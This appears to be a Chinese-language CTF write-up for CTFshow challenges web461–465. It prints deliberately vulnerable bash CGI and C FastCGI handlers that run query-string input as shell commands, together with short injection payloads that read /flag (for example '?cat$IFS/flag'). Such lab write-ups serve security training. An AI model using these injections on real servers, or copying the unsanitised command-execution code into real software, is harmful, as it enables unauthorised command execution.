环境模拟搭建:Nginx支持web界面执行bash|python等系统命令和脚本
web461
#!/bin/bash
# CGI handler: QUERY_STRING is split on commas; field 3 must equal "admin",
# after which fields 1 and 2 are joined and executed by command substitution.
#
# Security note: every field comes from the request. The "admin" check is a
# comparison against a value the requester supplies in the same string, not an
# authentication step, so this is an unauthenticated command-execution sink.
OIFS="$IFS"
IFS=","
# With IFS="," both the positional parameters and the Args array become the
# comma-separated fields of the query string (unquoted expansions, so the
# fields are also subject to pathname expansion).
set $QUERY_STRING
Args=($QUERY_STRING)
IFS="$OIFS"
# The literal "ctf" suffix on both sides presumably keeps [ from seeing an
# empty operand when the field is missing.
if [ "${Args[2]}"ctf = "admin"ctf ]; then
        # IFS has been restored to its previous value here, so the unquoted
        # $IFS between the two fields is word-split away: field 1 runs as the
        # command with field 2 as its argument(s), and the output is echoed.
        echo "`${Args[0]}$IFS${Args[1]}`"
fi
exit 0
 
 
以逗号分割值,第三个值等于admin即可rce
?cat,/flag,admin
web462
#!/bin/bash
# CGI handler: QUERY_STRING is split on commas; if field 1 is "ping", field 2
# is lightly rewritten and used as the target of "ping -c 1".
#
# Security note: field 2 comes from the request and is never validated against
# an address format or allow-list; the two sed substitutions only delete
# backslashes and turn "%20" into spaces, which is not input validation.
OIFS="$IFS"
IFS=","
# With IFS="," both the positional parameters and the Args array become the
# comma-separated fields of the query string.
set $QUERY_STRING
Args=($QUERY_STRING)
IFS="$OIFS"
# The literal "ctf" suffix on both sides presumably keeps [ from seeing an
# empty operand when the field is missing.
if [ "${Args[0]}"ctf = "ping"ctf ]; then
        # Field 2 is expanded unquoted inside the backticks, so it is
        # word-split and glob-expanded before echo sees it; the pipeline then
        # removes backslashes and decodes "%20" to a space.
        addr="`echo ${Args[1]} | sed 's|[\]||g' | sed 's|%20| |g'`"
        # Assignment context: no word splitting here, addr becomes the single
        # string "ping -c 1 <field>".
        addr="ping -c 1 "$addr
        # Unquoted expansion of the command string: word-split and
        # glob-expanded, then the first word runs with the rest as arguments.
        $addr
fi
 
 
与上一题差不多,多了两个过滤
不过测试后发现不出网，做不出来
https://www.reddit.com/r/securityCTF/comments/15stmxp/a_problem_about_linux_bashcgi_command_injection/?rdt=42831
web463
   | #include <stdlib.h> #include "fcgi_stdio.h" #include <cstring>
 
 
  int _System(const char * cmd, char *pRetMsg, int msg_len) { 	FILE * fp; 	char * p = NULL; 	int res = -1; 	if (cmd == NULL || pRetMsg == NULL || msg_len < 0) 	{ 		printf("Param Error!\n"); 		return -1; 	} 	if ((fp = popen(cmd, "r") ) == NULL) 	{ 		printf("Popen Error!\n"); 		return -2; 	} 	else 	{ 		memset(pRetMsg, 0, msg_len); 		 		while(fgets(pRetMsg, msg_len, fp) != NULL) 		{ 			printf("Msg:%s",pRetMsg);  		}
  		if ( (res = pclose(fp)) == -1) 		{ 			printf("close popenerror!\n"); 			return -3; 		} 		pRetMsg[strlen(pRetMsg)-1] = '\0'; 		return 0; 	} }
  int main(void) {     int count = 0;     char *cmd = "";     char a8Result[128] = {0};     int ret = 0;     while (FCGI_Accept() >= 0)         printf("Content-type: text/html\r\n"         "\r\n"         "<title>CTFshow</title>"         "<h1>where is flag?</h1>"         );         cmd=getenv("QUERY_STRING"); 	ret  = _System(cmd, a8Result, sizeof(a8Result));         printf("ret = %d \nresult = %s\nlength = %d \n", ret, a8Result, strlen(a8Result));     return 0; }
 
 
 
可以直接执行命令
?cat$IFS/flag
web464
   | #include <stdlib.h> #include "fcgi_stdio.h" #include <cstring>
 
 
  int _System(const char * cmd, char *pRetMsg, int msg_len) { 	FILE * fp; 	char * p = NULL; 	int res = -1; 	if (cmd == NULL || pRetMsg == NULL || msg_len < 0) 	{ 		printf("Param Error!\n"); 		return -1; 	} 	if ((fp = popen(cmd, "r") ) == NULL) 	{ 		printf("Popen Error!\n"); 		return -2; 	} 	else 	{ 		memset(pRetMsg, 0, msg_len); 		 		while(fgets(pRetMsg, msg_len, fp) != NULL) 		{ 			printf("Msg:%s",pRetMsg);  		}
  		if ( (res = pclose(fp)) == -1) 		{ 			printf("close popenerror!\n"); 			return -3; 		} 		pRetMsg[strlen(pRetMsg)-1] = '\0'; 		return 0; 	} }
  int main(void) {     int count = 0;     char *cmd = "";     char a8Result[128] = {0};     int ret = 0;     while (FCGI_Accept() >= 0)         printf("Content-type: text/html\r\n"         "\r\n"         "<title>CTFshow</title>"         "<h1>where is flag?</h1>"         );         cmd=getenv("QUERY_STRING"); 	ret  = _System(cmd, a8Result, sizeof(a8Result));     return 0; }
 
 
 
与上一题相比少了输出,但是没什么区别
?cat$IFS/flag
web465
给了编译好的cgi文件
逆向发现在main中没有直接调用_System,猜测需要溢出到_System然后就可以执行命令
不过地址不确定,暂时做不出来